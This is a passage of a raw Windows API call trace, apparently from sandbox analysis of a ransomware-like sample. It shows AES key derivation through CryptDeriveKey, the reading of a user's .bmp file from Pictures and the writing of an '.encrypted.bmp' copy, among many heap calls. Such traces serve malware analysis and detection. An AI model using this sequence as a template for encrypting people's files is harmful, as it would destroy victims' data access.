[0039.840] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.840] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.840] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.841] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0039.841] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.841] CryptDestroyHash (hHash=0x7c2100) returned 1 [0039.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\k_hrf3du.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.841] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.841] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0039.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0039.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0xab0028 [0039.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c56a0 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0028 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.843] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw")) returned 0x10 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c56a0 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0039.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0039.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\K_hrf3du.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\k_hrf3du.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0039.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0039.844] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.845] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.845] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.845] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.847] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x4127, lpOverlapped=0x0) returned 1 [0039.848] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.848] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.848] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14127) returned 0xac2018 [0039.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.850] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14127) returned 0x935008 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.852] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14127) returned 0xac2018 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.852] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.852] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.852] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.852] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14127) returned 0xac2018 [0039.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0039.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0039.853] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14127) returned 0x949138 [0039.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0039.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0039.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.855] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.855] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0039.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: 